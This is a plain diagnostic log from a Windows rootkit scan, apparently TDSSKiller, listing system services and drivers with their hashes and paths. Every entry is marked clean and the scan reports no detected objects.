18:04:23.0570 5696 [ DCF0F056A2E4F52287264F5AB29CF206 ] tssecsrv C:\Windows\system32\DRIVERS\tssecsrv.sys
18:04:23.0611 5696 tssecsrv - ok
18:04:23.0628 5696 [ CAECC0120AC49E3D2F758B9169872D38 ] tunmp C:\Windows\system32\DRIVERS\tunmp.sys
18:04:23.0673 5696 tunmp - ok
18:04:23.0694 5696 [ 300DB877AC094FEAB0BE7688C3454A9C ] tunnel C:\Windows\system32\DRIVERS\tunnel.sys
18:04:23.0718 5696 tunnel - ok
18:04:23.0753 5696 [ C3ADE15414120033A36C0F293D4A4121 ] uagp35 C:\Windows\system32\drivers\uagp35.sys
18:04:23.0777 5696 uagp35 - ok
18:04:23.0797 5696 [ D9728AF68C4C7693CB100B8441CBDEC6 ] udfs C:\Windows\system32\DRIVERS\udfs.sys
18:04:23.0838 5696 udfs - ok
18:04:23.0864 5696 [ ECEF404F62863755951E09C802C94AD5 ] UI0Detect C:\Windows\system32\UI0Detect.exe
18:04:23.0932 5696 UI0Detect - ok
18:04:23.0953 5696 [ 75E6890EBFCE0841D3291B02E7A8BDB0 ] uliagpkx C:\Windows\system32\drivers\uliagpkx.sys
18:04:23.0980 5696 uliagpkx - ok
18:04:24.0004 5696 [ 3CD4EA35A6221B85DCC25DAA46313F8D ] uliahci C:\Windows\system32\drivers\uliahci.sys
18:04:24.0033 5696 uliahci - ok
18:04:24.0053 5696 [ 8514D0E5CD0534467C5FC61BE94A569F ] UlSata C:\Windows\system32\drivers\ulsata.sys
18:04:24.0080 5696 UlSata - ok
18:04:24.0104 5696 [ 38C3C6E62B157A6BC46594FADA45C62B ] ulsata2 C:\Windows\system32\drivers\ulsata2.sys
18:04:24.0142 5696 ulsata2 - ok
18:04:24.0163 5696 [ 32CFF9F809AE9AED85464492BF3E32D2 ] umbus C:\Windows\system32\DRIVERS\umbus.sys
18:04:24.0225 5696 umbus - ok
18:04:24.0263 5696 [ 68308183F4AE0BE7BF8ECD07CB297999 ] upnphost C:\Windows\System32\upnphost.dll
18:04:24.0314 5696 upnphost - ok
18:04:24.0354 5696 [ EAFE1E00739AFE6C51487A050E772E17 ] USBAAPL C:\Windows\system32\Drivers\usbaapl.sys
18:04:24.0389 5696 USBAAPL - ok
18:04:24.0432 5696 [ CAF811AE4C147FFCD5B51750C7F09142 ] usbccgp C:\Windows\system32\DRIVERS\usbccgp.sys
18:04:24.0485 5696 usbccgp - ok
18:04:24.0532 5696 [ E9476E6C486E76BC4898074768FB7131 ] usbcir C:\Windows\system32\drivers\usbcir.sys
18:04:24.0608 5696 usbcir - ok
18:04:24.0685 5696 [ 79E96C23A97CE7B8F14D310DA2DB0C9B ] usbehci C:\Windows\system32\DRIVERS\usbehci.sys
18:04:24.0716 5696 usbehci - ok
18:04:24.0732 5696 [ 4673BBCB006AF60E7ABDDBE7A130BA42 ] usbhub C:\Windows\system32\DRIVERS\usbhub.sys
18:04:24.0794 5696 usbhub - ok
18:04:24.0810 5696 [ 38DBC7DD6CC5A72011F187425384388B ] usbohci C:\Windows\system32\drivers\usbohci.sys
18:04:24.0857 5696 usbohci - ok
18:04:24.0888 5696 [ E75C4B5269091D15A2E7DC0B6D35F2F5 ] usbprint C:\Windows\system32\DRIVERS\usbprint.sys
18:04:24.0935 5696 usbprint - ok
18:04:24.0997 5696 [ A508C9BD8724980512136B039BBA65E9 ] usbscan C:\Windows\system32\DRIVERS\usbscan.sys
18:04:25.0044 5696 usbscan - ok
18:04:25.0075 5696 [ BE3DA31C191BC222D9AD503C5224F2AD ] USBSTOR C:\Windows\system32\DRIVERS\USBSTOR.SYS
18:04:25.0122 5696 USBSTOR - ok
18:04:25.0169 5696 [ 814D653EFC4D48BE3B04A307ECEFF56F ] usbuhci C:\Windows\system32\DRIVERS\usbuhci.sys
18:04:25.0215 5696 usbuhci - ok
18:04:25.0262 5696 [ E67998E8F14CB0627A769F6530BCB352 ] usbvideo C:\Windows\system32\Drivers\usbvideo.sys
18:04:25.0309 5696 usbvideo - ok
18:04:25.0325 5696 [ 1509E705F3AC1D474C92454A5C2DD81F ] UxSms C:\Windows\System32\uxsms.dll
18:04:25.0356 5696 UxSms - ok
18:04:25.0387 5696 [ CD88D1B7776DC17A119049742EC07EB4 ] vds C:\Windows\System32\vds.exe
18:04:25.0449 5696 vds - ok
18:04:25.0481 5696 [ 7D92BE0028ECDEDEC74617009084B5EF ] vga C:\Windows\system32\DRIVERS\vgapnp.sys
18:04:25.0559 5696 vga - ok
18:04:25.0605 5696 [ 2E93AC0A1D8C79D019DB6C51F036636C ] VgaSave C:\Windows\System32\drivers\vga.sys
18:04:25.0637 5696 VgaSave - ok
18:04:25.0652 5696 [ 045D9961E591CF0674A920B6BA3BA5CB ] viaagp C:\Windows\system32\drivers\viaagp.sys
18:04:25.0668 5696 viaagp - ok
18:04:25.0683 5696 [ 56A4DE5F02F2E88182B0981119B4DD98 ] ViaC7 C:\Windows\system32\drivers\viac7.sys
18:04:25.0745 5696 ViaC7 - ok
18:04:25.0775 5696 [ FD2E3175FCADA350C7AB4521DCA187EC ] viaide C:\Windows\system32\drivers\viaide.sys
18:04:25.0785 5696 viaide - ok
18:04:25.0815 5696 [ 69503668AC66C77C6CD7AF86FBDF8C43 ] volmgr C:\Windows\system32\drivers\volmgr.sys
18:04:25.0835 5696 volmgr - ok
18:04:25.0875 5696 [ 23E41B834759917BFD6B9A0D625D0C28 ] volmgrx C:\Windows\system32\drivers\volmgrx.sys
18:04:25.0905 5696 volmgrx - ok
18:04:25.0935 5696 [ 786DB5771F05EF300390399F626BF30A ] volsnap C:\Windows\system32\drivers\volsnap.sys
18:04:25.0965 5696 volsnap - ok
18:04:25.0995 5696 [ D984439746D42B30FC65A4C3546C6829 ] vsmraid C:\Windows\system32\drivers\vsmraid.sys
18:04:26.0015 5696 vsmraid - ok
18:04:26.0065 5696 [ DB3D19F850C6EB32BDCB9BC0836ACDDB ] VSS C:\Windows\system32\vssvc.exe
18:04:26.0195 5696 VSS - ok
18:04:26.0225 5696 [ 96EA68B9EB310A69C25EBB0282B2B9DE ] W32Time C:\Windows\system32\w32time.dll
18:04:26.0275 5696 W32Time - ok
18:04:26.0295 5696 [ 48DFEE8F1AF7C8235D4E626F0C4FE031 ] WacomPen C:\Windows\system32\drivers\wacompen.sys
18:04:26.0345 5696 WacomPen - ok
18:04:26.0365 5696 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarp C:\Windows\system32\DRIVERS\wanarp.sys
18:04:26.0415 5696 Wanarp - ok
18:04:26.0415 5696 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarpv6 C:\Windows\system32\DRIVERS\wanarp.sys
18:04:26.0435 5696 Wanarpv6 - ok
18:04:26.0465 5696 [ A3CD60FD826381B49F03832590E069AF ] wcncsvc C:\Windows\System32\wcncsvc.dll
18:04:26.0525 5696 wcncsvc - ok
18:04:26.0555 5696 [ 11BCB7AFCDD7AADACB5746F544D3A9C7 ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
18:04:26.0595 5696 WcsPlugInService - ok
18:04:26.0645 5696 [ AFC5AD65B991C1E205CF25CFDBF7A6F4 ] Wd C:\Windows\system32\drivers\wd.sys
18:04:26.0675 5696 Wd - ok
18:04:26.0715 5696 [ A840213F1ACDCC175B4D1D5AAEAC0D7A ] Wdf01000 C:\Windows\system32\drivers\Wdf01000.sys
18:04:26.0755 5696 Wdf01000 - ok
18:04:26.0775 5696 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiServiceHost C:\Windows\system32\wdi.dll
18:04:26.0818 5696 WdiServiceHost - ok
18:04:26.0822 5696 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiSystemHost C:\Windows\system32\wdi.dll
18:04:26.0852 5696 WdiSystemHost - ok
18:04:26.0890 5696 [ 04C37D8107320312FBAE09926103D5E2 ] WebClient C:\Windows\System32\webclnt.dll
18:04:26.0920 5696 WebClient - ok
18:04:26.0953 5696 [ AE3736E7E8892241C23E4EBBB7453B60 ] Wecsvc C:\Windows\system32\wecsvc.dll
18:04:27.0005 5696 Wecsvc - ok
18:04:27.0040 5696 [ 670FF720071ED741206D69BD995EA453 ] wercplsupport C:\Windows\System32\wercplsupport.dll
18:04:27.0081 5696 wercplsupport - ok
18:04:27.0115 5696 [ 32B88481D3B326DA6DEB07B1D03481E7 ] WerSvc C:\Windows\System32\WerSvc.dll
18:04:27.0160 5696 WerSvc - ok
18:04:27.0213 5696 [ 4575AA12561C5648483403541D0D7F2B ] WinDefend C:\Program Files\Windows Defender\mpsvc.dll
18:04:27.0231 5696 WinDefend - ok
18:04:27.0237 5696 WinHttpAutoProxySvc - ok
18:04:27.0298 5696 [ 6B2A1D0E80110E3D04E6863C6E62FD8A ] Winmgmt C:\Windows\system32\wbem\WMIsvc.dll
18:04:27.0320 5696 Winmgmt - ok
18:04:27.0375 5696 [ 7CFE68BDC065E55AA5E8421607037511 ] WinRM C:\Windows\system32\WsmSvc.dll
18:04:27.0789 5696 WinRM - ok
18:04:27.0831 5696 [ C008405E4FEEB069E30DA1D823910234 ] Wlansvc C:\Windows\System32\wlansvc.dll
18:04:27.0901 5696 Wlansvc - ok
18:04:27.0917 5696 [ 2E7255D172DF0B8283CDFB7B433B864E ] WmiAcpi C:\Windows\system32\DRIVERS\wmiacpi.sys
18:04:27.0958 5696 WmiAcpi - ok
18:04:28.0003 5696 [ 43BE3875207DCB62A85C8C49970B66CC ] wmiApSrv C:\Windows\system32\wbem\WmiApSrv.exe
18:04:28.0099 5696 wmiApSrv - ok
18:04:28.0150 5696 [ 3978704576A121A9204F8CC49A301A9B ] WMPNetworkSvc C:\Program Files\Windows Media Player\wmpnetwk.exe
18:04:28.0200 5696 WMPNetworkSvc - ok
18:04:28.0230 5696 [ CFC5A04558F5070CEE3E3A7809F3FF52 ] WPCSvc C:\Windows\System32\wpcsvc.dll
18:04:28.0280 5696 WPCSvc - ok
18:04:28.0320 5696 [ 801FBDB89D472B3C467EB112A0FC9246 ] WPDBusEnum C:\Windows\system32\wpdbusenum.dll
18:04:28.0340 5696 WPDBusEnum - ok
18:04:28.0380 5696 [ DE9D36F91A4DF3D911626643DEBF11EA ] WpdUsb C:\Windows\system32\DRIVERS\wpdusb.sys
18:04:28.0420 5696 WpdUsb - ok
18:04:28.0540 5696 [ DCF3E3EDF5109EE8BC02FE6E1F045795 ] WPFFontCache_v0400 C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
18:04:28.0610 5696 WPFFontCache_v0400 - ok
18:04:28.0620 5696 [ E3A3CB253C0EC2494D4A61F5E43A389C ] ws2ifsl C:\Windows\system32\drivers\ws2ifsl.sys
18:04:28.0650 5696 ws2ifsl - ok
18:04:28.0680 5696 [ 1CA6C40261DDC0425987980D0CD2AAAB ] wscsvc C:\Windows\System32\wscsvc.dll
18:04:28.0720 5696 wscsvc - ok
18:04:28.0730 5696 WSearch - ok
18:04:28.0810 5696 [ FC3EC24FCE372C89423E015A2AC1A31E ] wuauserv C:\Windows\system32\wuaueng.dll
18:04:29.0120 5696 wuauserv - ok
18:04:29.0160 5696 [ 06E6F32C8D0A3F66D956F57B43A2E070 ] WudfPf C:\Windows\system32\drivers\WudfPf.sys
18:04:29.0200 5696 WudfPf - ok
18:04:29.0210 5696 [ 867C301E8B790040AE9CF6486E8041DF ] WUDFRd C:\Windows\system32\DRIVERS\WUDFRd.sys
18:04:29.0230 5696 WUDFRd - ok
18:04:29.0260 5696 [ FE47B7BC8EA320C2D9B5E5BF6E303765 ] wudfsvc C:\Windows\System32\WUDFSvc.dll
18:04:29.0280 5696 wudfsvc - ok
18:04:29.0310 5696 [ C6CA0CC2F7FCDCFE5B551335BFE6D696 ] yukonwlh C:\Windows\system32\DRIVERS\yk60x86.sys
18:04:29.0340 5696 yukonwlh - ok
18:04:29.0350 5696 ================ Scan global ===============================
18:04:29.0380 5696 [ F31EEBC1A1C81FD04005489CC3DCDFE7 ] C:\Windows\system32\basesrv.dll
18:04:29.0410 5696 [ D2293B069E4B63DC17B2F08D45E71124 ] C:\Windows\system32\winsrv.dll
18:04:29.0440 5696 [ D2293B069E4B63DC17B2F08D45E71124 ] C:\Windows\system32\winsrv.dll
18:04:29.0470 5696 [ D4E6D91C1349B7BFB3599A6ADA56851B ] C:\Windows\system32\services.exe
18:04:29.0480 5696 [Global] - ok
18:04:29.0480 5696 ================ Scan MBR ==================================
18:04:29.0500 5696 [ 5C616939100B85E558DA92B899A0FC36 ] \Device\Harddisk0\DR0
18:04:30.0110 5696 \Device\Harddisk0\DR0 - ok
18:04:30.0400 5696 [ 5FB38429D5D77768867C76DCBDB35194 ] \Device\Harddisk1\DR1
18:04:30.0720 5696 \Device\Harddisk1\DR1 - ok
18:04:30.0730 5696 [ 8F558EB6672622401DA993E1E865C861 ] \Device\Harddisk2\DR2
18:04:30.0886 5696 \Device\Harddisk2\DR2 - ok
18:04:30.0886 5696 ================ Scan VBR ==================================
18:04:30.0890 5696 [ 961EA6BC3F5CD34DA67B2EEE8AA84D1B ] \Device\Harddisk0\DR0\Partition1
18:04:30.0893 5696 \Device\Harddisk0\DR0\Partition1 - ok
18:04:30.0919 5696 [ 758AD88425527B05E4FA98631C162C08 ] \Device\Harddisk0\DR0\Partition2
18:04:30.0920 5696 \Device\Harddisk0\DR0\Partition2 - ok
18:04:30.0933 5696 [ EFF1ECE495ECBDEA78E34410A05FC2D3 ] \Device\Harddisk0\DR0\Partition3
18:04:30.0935 5696 \Device\Harddisk0\DR0\Partition3 - ok
18:04:30.0939 5696 [ D894F5CF2FC97000C4CD292863AEACC0 ] \Device\Harddisk1\DR1\Partition1
18:04:30.0940 5696 \Device\Harddisk1\DR1\Partition1 - ok
18:04:30.0945 5696 [ B40BC0A08101F64916E605AE52C91653 ] \Device\Harddisk2\DR2\Partition1
18:04:30.0948 5696 \Device\Harddisk2\DR2\Partition1 - ok
18:04:30.0949 5696 ============================================================
18:04:30.0949 5696 Scan finished
18:04:30.0949 5696 ============================================================
18:04:30.0962 5680 Detected object count: 0
18:04:30.0962 5680 Actual detected object count: 0
18:04:48.0866 5600 ============================================================
18:04:48.0866 5600 Scan started
18:04:48.0866 5600 Mode: Manual; SigCheck; TDLFS;
18:04:48.0866 5600 ============================================================
18:04:49.0475 5600 ================ Scan system memory ========================
18:04:49.0475 5600 System memory - ok
18:04:49.0475 5600 ================ Scan services =============================
18:04:49.0646 5600 [ AEF9EE4451D5C46370142CB06D0F3591 ] Accelerometer C:\Windows\system32\DRIVERS\Accelerometer.sys
18:04:49.0662 5600 Accelerometer - ok
18:04:49.0693 5600 [ 82B296AE1892FE3DBEE00C9CF92F8AC7 ] ACPI C:\Windows\system32\drivers\acpi.sys
18:04:49.0709 5600 ACPI - ok
18:04:49.0740 5600 [ BF9DE454F80A1516D4D582520B2D6EDD ] ADIHdAudAddService C:\Windows\system32\drivers\ADIHdAud.sys
18:04:49.0755 5600 ADIHdAudAddService - ok
18:04:49.0849 5600 [ D19C4EE2AC7C47B8F5F84FFF1A789D8A ] AdobeARMservice C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
18:04:49.0849 5600 AdobeARMservice - ok
18:04:49.0896 5600 [ EC807244904FA170C299AB06D87FBDBE ] AdobeFlashPlayerUpdateSvc C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
18:04:49.0911 5600 AdobeFlashPlayerUpdateSvc - ok
18:04:49.0958 5600 [ 2EDC5BBAC6C651ECE337BDE8ED97C9FB ] adp94xx C:\Windows\system32\drivers\adp94xx.sys
18:04:49.0974 5600 adp94xx - ok
18:04:49.0989 5600 [ B84088CA3CDCA97DA44A984C6CE1CCAD ] adpahci C:\Windows\system32\drivers\adpahci.sys
18:04:50.0005 5600 adpahci - ok
18:04:50.0036 5600 [ 7880C67BCCC27C86FD05AA2AFB5EA469 ] adpu160m C:\Windows\system32\drivers\adpu160m.sys
18:04:50.0036 5600 adpu160m - ok
18:04:50.0067 5600 [ 9AE713F8E30EFC2ABCCD84904333DF4D ] adpu320 C:\Windows\system32\drivers\adpu320.sys
18:04:50.0083 5600 adpu320 - ok
18:04:50.0114 5600 [ 30EB9BCF0D1E4EDD3905AE003AC0C1AC ] AEADIFilters C:\Windows\system32\AEADISRV.EXE
18:04:50.0130 5600 AEADIFilters - ok
18:04:50.0145 5600 [ 9D1FDA9E086BA64E3C93C9DE32461BCF ] AeLookupSvc C:\Windows\System32\aelupsvc.dll
18:04:50.0161 5600 AeLookupSvc - ok
18:04:50.0192 5600 [ 3911B972B55FEA0478476B2E777B29FA ] AFD C:\Windows\system32\drivers\afd.sys
18:04:50.0223 5600 AFD - ok
18:04:50.0239 5600 [ 9C9D3B7A05445B1AB2DF4D0C4D6B77E8 ] AgereModemAudio C:\Program Files\LSI SoftModem\agrsmsvc.exe
18:04:50.0255 5600 AgereModemAudio - ok
18:04:50.0301 5600 [ 3712986CC3ABF0DC656B43525B9D1279 ] AgereSoftModem C:\Windows\system32\DRIVERS\AGRSM.sys
18:04:50.0364 5600 AgereSoftModem - ok
18:04:50.0411 5600 [ EF23439CDD587F64C2C1B8825CEAD7D8 ] agp440 C:\Windows\system32\drivers\agp440.sys
18:04:50.0411 5600 agp440 - ok
18:04:50.0442 5600 [ AE1FDF7BF7BB6C6A70F67699D880592A ] aic78xx C:\Windows\system32\drivers\djsvs.sys
18:04:50.0442 5600 aic78xx - ok
18:04:50.0473 5600 [ A1545B731579895D8CC44FC0481C1192 ] ALG C:\Windows\System32\alg.exe
18:04:50.0504 5600 ALG - ok
18:04:50.0520 5600 [ 90395B64600EBB4552E26E178C94B2E4 ] aliide C:\Windows\system32\drivers\aliide.sys
18:04:50.0520 5600 aliide - ok
18:04:50.0535 5600 [ 2B13E304C9DFDFA5EB582F6A149FA2C7 ] amdagp C:\Windows\system32\drivers\amdagp.sys
18:04:50.0551 5600 amdagp - ok
18:04:50.0567 5600 [ 0577DF1D323FE75A739C787893D300EA ] amdide C:\Windows\system32\drivers\amdide.sys
18:04:50.0582 5600 amdide - ok
18:04:50.0598 5600 [ DC487885BCEF9F28EECE6FAC0E5DDFC5 ] AmdK7 C:\Windows\system32\drivers\amdk7.sys
18:04:50.0645 5600 AmdK7 - ok
18:04:50.0645 5600 [ 0CA0071DA4315B00FC1328CA86B425DA ] AmdK8 C:\Windows\system32\drivers\amdk8.sys
18:04:50.0691 5600 AmdK8 - ok
18:04:50.0738 5600 [ 466A0D95960DAD3222C896D2CEA99993 ] AntiVirSchedulerService C:\Program Files\Avira\AntiVir Desktop\sched.exe
18:04:50.0754 5600 AntiVirSchedulerService - ok
18:04:50.0785 5600 [ A489BE6BB0AA1FF406B488B60542314B ] AntiVirService C:\Program Files\Avira\AntiVir Desktop\avguard.exe
18:04:50.0801 5600 AntiVirService - ok
18:04:50.0816 5600 [ C6D704C7F0434DC791AAC37CAC4B6E14 ] Appinfo C:\Windows\System32\appinfo.dll
18:04:50.0832 5600 Appinfo - ok
18:04:50.0879 5600 [ F401929EE0CC92BFE7F15161CA535383 ] Apple Mobile Device C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
18:04:50.0894 5600 Apple Mobile Device - ok
18:04:50.0925 5600 [ 5F673180268BB1FDB69C99B6619FE379 ] arc C:\Windows\system32\drivers\arc.sys
18:04:50.0941 5600 arc - ok
18:04:50.0957 5600 [ 957F7540B5E7F602E44648C7DE5A1C05 ] arcsas C:\Windows\system32\drivers\arcsas.sys
18:04:50.0972 5600 arcsas - ok
18:04:50.0988 5600 [ 53B202ABEE6455406254444303E87BE1 ] AsyncMac C:\Windows\system32\DRIVERS\asyncmac.sys
18:04:51.0019 5600 AsyncMac - ok
18:04:51.0035 5600 [ 1F05B78AB91C9075565A9D8A4B880BC4 ] atapi C:\Windows\system32\drivers\atapi.sys
18:04:51.0050 5600 atapi - ok
18:04:51.0081 5600 [ 68E2A1A0407A66CF50DA0300852424AB ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
18:04:51.0113 5600 AudioEndpointBuilder - ok
18:04:51.0113 5600 [ 68E2A1A0407A66CF50DA0300852424AB ] Audiosrv C:\Windows\System32\Audiosrv.dll
18:04:51.0144 5600 Audiosrv - ok
18:04:51.0159 5600 [ D5541F0AFB767E85FC412FC609D96A74 ] avgntflt C:\Windows\system32\DRIVERS\avgntflt.sys
18:04:51.0169 5600 avgntflt - ok
18:04:51.0189 5600 [ 7D967A682D4694DF7FA57D63A2DB01FE ] avipbb C:\Windows\system32\DRIVERS\avipbb.sys
18:04:51.0199 5600 avipbb - ok
18:04:51.0209 5600 [ 271CFD1A989209B1964E24D969552BF7 ] avkmgr C:\Windows\system32\DRIVERS\avkmgr.sys
18:04:51.0219 5600 avkmgr - ok
18:04:51.0249 5600 [ 0A5E8178EFF1D8F109A95235AEB7D76F ] azvusb C:\Windows\system32\DRIVERS\azvusb.sys
18:04:51.0259 5600 azvusb - ok
18:04:51.0289 5600 [ 67E506B75BD5326A3EC7B70BD014DFB6 ] Beep C:\Windows\system32\drivers\Beep.sys
18:04:51.0319 5600 Beep - ok
18:04:51.0349 5600 [ C789AF0F724FDA5852FB9A7D3A432381 ] BFE C:\Windows\System32\bfe.dll
18:04:51.0379 5600 BFE - ok
18:04:51.0419 5600 [ 93952506C6D67330367F7E7934B6A02F ] BITS C:\Windows\System32\qmgr.dll
18:04:51.0459 5600 BITS - ok
18:04:51.0469 5600 blbdrive - ok
18:04:51.0529 5600 [ DB5BEA73EDAF19AC68B2C0FAD0F92B1A ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
18:04:51.0539 5600 Bonjour Service - ok
18:04:51.0579 5600 [ 35F376253F687BDE63976CCB3F2108CA ] bowser C:\Windows\system32\DRIVERS\bowser.sys
18:04:51.0589 5600 bowser - ok
18:04:51.0639 5600 [ 9F9ACC7F7CCDE8A15C282D3F88B43309 ] BrFiltLo C:\Windows\system32\drivers\brfiltlo.sys
18:04:51.0659 5600 BrFiltLo - ok
18:04:51.0669 5600 [ 56801AD62213A41F6497F96DEE83755A ] BrFiltUp C:\Windows\system32\drivers\brfiltup.sys
18:04:51.0689 5600 BrFiltUp - ok
18:04:51.0719 5600 [ A3629A0C4226F9E9C72FAAEEBC3AD33C ] Browser C:\Windows\System32\browser.dll
18:04:51.0749 5600 Browser - ok
18:04:51.0759 5600 [ B304E75CFF293029EDDF094246747113 ] Brserid C:\Windows\system32\drivers\brserid.sys
18:04:51.0809 5600 Brserid - ok
18:04:51.0829 5600 [ 203F0B1E73ADADBBB7B7B1FABD901F6B ] BrSerWdm C:\Windows\system32\drivers\brserwdm.sys
18:04:51.0869 5600 BrSerWdm - ok
18:04:51.0889 5600 [ BD456606156BA17E60A04E18016AE54B ] BrUsbMdm C:\Windows\system32\drivers\brusbmdm.sys
18:04:51.0929 5600 BrUsbMdm - ok
18:04:51.0949 5600 [ AF72ED54503F717A43268B3CC5FAEC2E ] BrUsbSer C:\Windows\system32\drivers\brusbser.sys
18:04:51.0989 5600 BrUsbSer - ok
18:04:52.0019 5600 [ 6D39C954799B63BA866910234CF7D726 ] BthEnum C:\Windows\system32\DRIVERS\BthEnum.sys
18:04:52.0049 5600 BthEnum - ok
18:04:52.0069 5600 [ AD07C1EC6665B8B35741AB91200C6B68 ] BTHMODEM C:\Windows\system32\drivers\bthmodem.sys
18:04:52.0119 5600 BTHMODEM - ok
18:04:52.0149 5600 [ 5904EFA25F829BF84EA6FB045134A1D8 ] BthPan C:\Windows\system32\DRIVERS\bthpan.sys
18:04:52.0169 5600 BthPan - ok
18:04:52.0219 5600 [ 611FF3F2F095C8D4A6D4CFD9DCC09793 ] BTHPORT C:\Windows\system32\Drivers\BTHport.sys
18:04:52.0239 5600 BTHPORT - ok
18:04:52.0269 5600 [ A4C8377FA4A994E07075107DBE2E3DCE ] BthServ C:\Windows\System32\bthserv.dll
18:04:52.0289 5600 BthServ - ok
18:04:52.0299 5600 [ D330803EAB2A15CAEC7F011F1D4CB30E ] BTHUSB C:\Windows\system32\Drivers\BTHUSB.sys
18:04:52.0309 5600 BTHUSB - ok
18:04:52.0339 5600 [ 7ADD03E75BEB9E6DD102C3081D29840A ] cdfs C:\Windows\system32\DRIVERS\cdfs.sys
18:04:52.0359 5600 cdfs - ok
18:04:52.0389 5600 [ 6B4BFFB9BECD728097024276430DB314 ] cdrom C:\Windows\system32\DRIVERS\cdrom.sys
18:04:52.0409 5600 cdrom - ok
18:04:52.0439 5600 [ 312EC3E37A0A1F2006534913E37B4423 ] CertPropSvc C:\Windows\System32\certprop.dll
18:04:52.0459 5600 CertPropSvc - ok
18:04:52.0489 5600 [ DA8E0AFC7BAA226C538EF53AC2F90897 ] circlass C:\Windows\system32\drivers\circlass.sys
18:04:52.0539 5600 circlass - ok
18:04:52.0569 5600 [ D7659D3B5B92C31E84E53C1431F35132 ] CLFS C:\Windows\system32\CLFS.sys
18:04:52.0589 5600 CLFS - ok
18:04:52.0639 5600 [ 8EE772032E2FE80A924F3B8DD5082194 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
18:04:52.0649 5600 clr_optimization_v2.0.50727_32 - ok
18:04:52.0719 5600 [ C5A75EB48E2344ABDC162BDA79E16841 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
18:04:52.0739 5600 clr_optimization_v4.0.30319_32 - ok
18:04:52.0749 5600 [ 99AFC3795B58CC478FBBBCDC658FCB56 ] CmBatt C:\Windows\system32\DRIVERS\CmBatt.sys
18:04:52.0789 5600 CmBatt - ok
18:04:52.0809 5600 [ 45201046C776FFDAF3FC8A0029C581C8 ] cmdide C:\Windows\system32\drivers\cmdide.sys
18:04:52.0829 5600 cmdide - ok
18:04:52.0839 5600 [ 6AFEF0B60FA25DE07C0968983EE4F60A ] Compbatt C:\Windows\system32\DRIVERS\compbatt.sys
18:04:52.0859 5600 Compbatt - ok
18:04:52.0869 5600 COMSysApp - ok
18:04:52.0879 5600 [ 2A213AE086BBEC5E937553C7D9A2B22C ] crcdisk C:\Windows\system32\drivers\crcdisk.sys
18:04:52.0889 5600 crcdisk - ok
18:04:52.0909 5600 [ 22A7F883508176489F559EE745B5BF5D ] Crusoe C:\Windows\system32\drivers\crusoe.sys
18:04:52.0969 5600 Crusoe - ok
18:04:52.0999 5600 [ F1E8C34892336D33EDDCDFE44E474F64 ] CryptSvc C:\Windows\system32\cryptsvc.dll
18:04:53.0019 5600 CryptSvc - ok
18:04:53.0059 5600 [ 3B5B4D53FEC14F7476CA29A20CC31AC9 ] DcomLaunch C:\Windows\system32\rpcss.dll
18:04:53.0099 5600 DcomLaunch - ok
18:04:53.0129 5600 [ 622C41A07CA7E6DD91770F50D532CB6C ] DfsC C:\Windows\system32\Drivers\dfsc.sys
18:04:53.0159 5600 DfsC - ok
18:04:53.0259 5600 [ 2CC3DCFB533A1035B13DCAB6160AB38B ] DFSR C:\Windows\system32\DFSR.exe
18:04:53.0389 5600 DFSR - ok
18:04:53.0429 5600 [ 9028559C132146FB75EB7ACF384B086A ] Dhcp C:\Windows\System32\dhcpcsvc.dll
18:04:53.0449 5600 Dhcp - ok
18:04:53.0469 5600 [ 5D4AEFC3386920236A548271F8F1AF6A ] disk C:\Windows\system32\drivers\disk.sys
18:04:53.0489 5600 disk - ok
18:04:53.0519 5600 [ 57D762F6F5974AF0DA2BE88A3349BAAA ] Dnscache C:\Windows\System32\dnsrslvr.dll
18:04:53.0549 5600 Dnscache - ok
18:04:53.0579 5600 [ 324FD74686B1EF5E7C19A8AF49E748F6 ] dot3svc C:\Windows\System32\dot3svc.dll
18:04:53.0609 5600 dot3svc - ok
18:04:53.0639 5600 [ A622E888F8AA2F6B49E9BC466F0E5DEF ] DPS C:\Windows\system32\dps.dll
18:04:53.0669 5600 DPS - ok
18:04:53.0689 5600 [ 97FEF831AB90BEE128C9AF390E243F80 ] drmkaud C:\Windows\system32\drivers\drmkaud.sys
18:04:53.0709 5600 drmkaud - ok
18:04:53.0739 5600 [ C68AC676B0EF30CFBB1080ADCE49EB1F ] DXGKrnl C:\Windows\System32\drivers\dxgkrnl.sys
18:04:53.0779 5600 DXGKrnl - ok
18:04:53.0809 5600 [ F88FB26547FD2CE6D0A5AF2985892C48 ] E1G60 C:\Windows\system32\DRIVERS\E1G60I32.sys
18:04:53.0859 5600 E1G60 - ok
18:04:53.0911 5600 [ C0B95E40D85CD807D614E264248A45B9 ] EapHost C:\Windows\System32\eapsvc.dll
18:04:53.0926 5600 EapHost - ok
18:04:53.0973 5600 [ 7F64EA048DCFAC7ACF8B4D7B4E6FE371 ] Ecache C:\Windows\system32\drivers\ecache.sys
18:04:53.0989 5600 Ecache - ok
18:04:54.0004 5600 [ E8F3F21A71720C84BCF423B80028359F ] elxstor C:\Windows\system32\drivers\elxstor.sys
18:04:54.0020 5600 elxstor - ok
18:04:54.0051 5600 [ 4E6B23DFC917EA39306B529B773950F4 ] EMDMgmt C:\Windows\system32\emdmgmt.dll
18:04:54.0082 5600 EMDMgmt - ok
18:04:54.0129 5600 [ 67058C46504BC12D821F38CF99B7B28F ] EventSystem C:\Windows\system32\es.dll
18:04:54.0160 5600 EventSystem - ok
18:04:54.0191 5600 [ 22B408651F9123527BCEE54B4F6C5CAE ] exfat C:\Windows\system32\drivers\exfat.sys
18:04:54.0207 5600 exfat - ok
18:04:54.0238 5600 [ 1E9B9A70D332103C52995E957DC09EF8 ] fastfat C:\Windows\system32\drivers\fastfat.sys
18:04:54.0269 5600 fastfat - ok
